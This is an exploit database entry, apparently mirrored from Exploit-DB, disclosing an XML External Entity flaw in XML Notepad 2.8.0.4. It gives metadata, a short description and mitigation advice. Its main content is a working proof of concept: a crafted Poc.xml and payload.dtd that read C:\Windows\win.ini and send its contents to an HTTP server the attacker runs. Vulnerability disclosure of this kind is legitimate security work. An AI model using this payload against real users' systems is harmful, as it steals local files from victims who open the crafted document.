XML Notepad 2.8.0.4 - XML External Entity Injection

vendor:

XML Notepad

by:

8-Team / daejinoh

8.8

CVSS

HIGH

XML External Entity Injection

611

CWE

Product Name: XML Notepad

Affected Version From: 2.8.0.4

Affected Version To: 2.8.0.4

Patch Exists: NO

Related CWE: N/A

CPE: a:microsoft:xml_notepad:2.8.0.4

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Pro

2019

XML Notepad 2.8.0.4 – XML External Entity Injection

XML Notepad 2.8.0.4 is vulnerable to XML External Entity Injection. An attacker can craft a malicious XML file and send it to the victim, which can then be used to read local files on the victim's system. The attacker can also use the malicious XML file to send the contents of the local files to a remote server.

Mitigation:

To mitigate XML External Entity Injection, applications should use a whitelist of allowed entities and disable all external entities. Additionally, applications should use a parser that is configured to disable external entities.

Source

Exploit-DB raw data:

# Exploit Title: XML Notepad 2.8.0.4 - XML External Entity Injection
# Date: 2019-11-11
# Exploit Author: 8-Team / daejinoh
# Vendor Homepage:  https://www.microsoft.com/  
# Software Link:  https://github.com/microsoft/XmlNotepad  
# Version: XML Notepad 2.8.0.4
# Tested on: Windows 10 Pro
# CVE : N/A

# Step
1) File -> Open -> *.xml

# Exploit Code

1) Server(python 3.7) : python -m http.server
2) Poc.xml : 
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

3) payload.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;

  --------------------------------------------------------------------------------